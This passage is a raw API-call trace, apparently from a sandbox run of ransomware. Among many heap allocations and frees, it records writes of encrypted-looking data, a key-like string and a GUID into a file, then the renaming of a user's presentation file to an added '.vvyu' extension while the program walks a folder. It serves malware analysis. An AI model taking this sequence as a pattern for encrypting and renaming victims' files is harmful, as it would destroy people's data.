lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0195.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0195.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0195.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a138 [0195.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0195.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0195.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0195.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0195.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0195.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0195.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0195.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0195.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0c0 [0195.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0195.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0195.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0195.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a090 [0195.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0195.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a150 [0195.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0195.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0d8 [0195.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0f0 [0195.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a168 [0195.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0195.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0f0 [0195.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0195.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0195.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0195.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0195.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0195.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a078 [0195.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0195.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a138 | out: hHeap=0x6a0000) returned 1 [0195.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0195.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a168 | out: hHeap=0x6a0000) returned 1 [0195.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b678 [0195.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0195.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0195.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0195.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0195.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0195.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0195.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0195.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0195.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0195.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0195.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0195.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0195.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0195.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0195.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a150 | out: hHeap=0x6a0000) returned 1 [0195.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0195.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0195.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0195.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0195.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a120 | out: hHeap=0x6a0000) returned 1 [0195.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d425c8 | out: hHeap=0x6a0000) returned 1 [0195.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0195.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0195.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0195.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0195.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0195.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0195.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0195.211] WriteFile (in: hFile=0x52c, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x8493, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x8493, lpOverlapped=0x0) returned 1 [0195.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0195.212] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x8498, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.212] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0195.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0195.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0195.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0195.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0195.214] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0195.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.214] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.214] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0195.214] CloseHandle (hObject=0x52c) returned 1 [0195.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47790 [0195.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d2cc80 [0195.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47790 | out: hHeap=0x6a0000) returned 1 [0195.216] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\VVjlRm5Wps_PeZL.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\nooizr\\vvjlrm5wps_pezl.odp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\VVjlRm5Wps_PeZL.odp.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\nooizr\\vvjlrm5wps_pezl.odp.vvyu")) returned 1 [0195.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0195.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0195.219] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0195.222] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36a71c70, ftCreationTime.dwHighDateTime=0x1d89904, ftLastAccessTime.dwLowDateTime=0x8ea8b7e0, ftLastAccessTime.dwHighDateTime=0x1d89a07, ftLastWriteTime.dwLowDateTime=0x8ea8b7e0, ftLastWriteTime.dwHighDateTime=0x1d89a07, nFileSizeHigh=0x0, nFileSizeLow=0x8498, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VVjlRm5Wps_PeZL.odp", cAlternateFileName="VVJLRM~1.ODP")) returned 0 [0195.223] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0195.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b550 | out: hHeap=0x6a0000) returned 1 [0195.224] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0195.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0195.224] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0195.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0195.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.239] HeapFree (in: 